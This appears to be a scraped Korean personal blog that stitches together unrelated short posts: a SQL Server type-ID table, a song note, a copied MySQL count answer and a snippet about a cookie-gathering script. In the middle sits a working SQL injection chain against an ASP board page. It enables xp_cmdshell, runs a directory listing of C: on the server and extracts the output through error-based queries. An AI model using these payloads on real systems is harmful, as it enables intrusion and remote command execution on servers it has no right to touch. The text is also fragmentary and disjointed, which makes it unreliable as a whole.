
TypeName TypeID

image 34

text 35

uniqueidentifier 36

date 40

time 41

datetime2 42

datetimeoffset 43

tinyint 48

smallint 52

int 56

smalldatetime 58

real 59

money 60

datetime 61

float 62

sql_variant 98

ntext 99

bit 104

decimal 106

numeric 108

smallmoney 122

bigint 127

varbinary 165

varchar 167

binary 173

char 175

timestamp 189

nvarchar 231

sysname 231

nchar 239

hierarchyid 240

geometry 240

geography 240

xml 241

Posted by 김주일
Posted by 김주일
나만의공간/노래2009. 8. 1. 23:08


이중국가 다큐의 엔딩곡으로 들음.
Posted by 김주일


exec sp_configure 'Ad Hoc Distributed Queries',1;
exec sp_configure 'show advanced options',1;
exec sp_configure xp_cmdshell,1;



/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table

[pangolin_test_table] add id int not null identity (1,1)--

/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] order by [id])


/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 2 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 3 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 4 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 5 id from [pangolin_test_table] order by [id]) )>0--

Posted by 김주일


I think what you want is to print `TRUE`(1) if there exists at least one match else `FALSE`(0)
for that you can use :

select count(*) >= 1 from test where testdata = 5;

This will return `1` if there is one or more rows that satisfies the given condition.
else if no match is found it will return `0`

If you want the number of matching rows then simply execute the following.

select count(*) from test where testdata = 5;

hope that will solve the problem.

출 처 : http://www.webyog.com/forums//lofiversion/index.php/t3149.html
Posted by 김주일
Posted by 김주일
# gather.sh

# sh gather.sh "" |tee cookies.txt

# cat cookies.txt
Posted by 김주일
나만의공간/노래2009. 7. 2. 15:44

Posted by 김주일
시스템/윈도우보안2009. 6. 30. 18:41
Posted by 김주일
출 처 : http://network.hanb.co.kr/view.php?bi_id=547

Posted by 김주일